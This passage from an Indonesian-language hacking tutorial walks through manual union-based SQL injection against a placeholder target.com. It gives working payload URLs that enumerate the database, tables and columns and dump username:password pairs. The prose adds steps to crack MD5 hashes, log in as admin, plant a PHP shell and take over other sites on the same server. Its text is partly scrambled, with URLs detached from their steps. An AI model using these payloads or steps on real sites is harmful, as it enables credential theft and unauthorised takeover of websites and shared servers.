Dapatkan Nama Column

Table of Contents

Dapatkan Nama Column

Dapatkan Nama Column
Dapatkan Nama Column

http://www.target.com/index.php?id=4+union+select+1,concat(user(),0x3a,database()),version(),4,5–
http://www.target.com/index.php?id=4+union+select+1,2,table_name,4,5+from+information_schema.tables+where+table_schema=database()+limit+0,1–
http://www.target.com/index.php?id=4+union+select+1,2,group_concat(table_name),4,5+from+information_schema.tables+where+table_schema=database()–

table_user sudah saya dapatkan selanjutnya yaitu mencari nama column pada table tersebut, untuk itu saya menggunakan perintah group_concat(column_name) sehingga urlnya menjadi
pada tahap ini kamu wajib mengextrak kata yang keluar pada isi table tadi menjadi hexadecimal yaitu dengan cara mengkonversinya. Salah satu website yg digunakan untuk konversi :
Contoh kata yg ingin di konversi yaitu table_user maka akan menjadi 7461626c655f75736572 ini masih belum selesai, anda harus menambahkan angka 0 dan huruf x pada awal hasil hexa tersebut sehingga hasilnya menjadi 0x7461626c655f75736572 dan inilah yang akan kita injeksikan pada nama tabel. Sehingga urlnya menjadi
Alhasil nama column dari table_user sudah saya dapatkan yaitu user_id dan password_id.
7. Dapatkan Usename & Password
Saya sudah mendapatkan nama table “table_user” yang berisi 2 buah column yaitu “user_id” dan “password_id” dan akhirnya anda sudah sampai di detik-detik terakhir yaitu menampilkan isi data dari column tersebut. Tambahkan 0x3a pada group_concat(hasil isi column yg mau dikeluarkan,0x3a, hasil isi column yg mau dikeluarkan) perintah +from+(nama table berasal)  dimasukkan setelah angka terakhir sehingga urlnya menjadi :

Tampillah seluruh username dan password dari situs tersebut. Biasanya password yang kita dapat sudah terenkripsi dalam bentuk md5 atau enkripsi yang lainnya. Untuk menterjemahkannya anda bisa mencari website yang

http://www.target.com/index.php?id=4+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name=0xhexa–
http://www.string-functions.com/string-hex.aspx
http://www.target.com/index.php?id=4+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name=0x7461626c655f75736572–
http://www.target.com/index.php?id=4+union+select+1,2,group_concat(user_id,0x3a,password_id),4,5+from+table_user–

menyediakan cracking password atau dengan tool cracking password. Setelah itu anda tinggal mencari halaman log in admin dan masuki sistemnya. Setelah memasuki sistem biasanya hacker menanamkan php shell untuk lebih gampang keluar masuk dan bisa mengexplore isi dari website tersebut terlebih lagi si hacker bisa melakukan teknik jumping sehingga semua website yang berada dalam 1 server yang sama dengan website yang terkena hack tersebut bisa di ambil alih oleh hacker tersebut, berbahaya sekali bukan?

Baca Juga :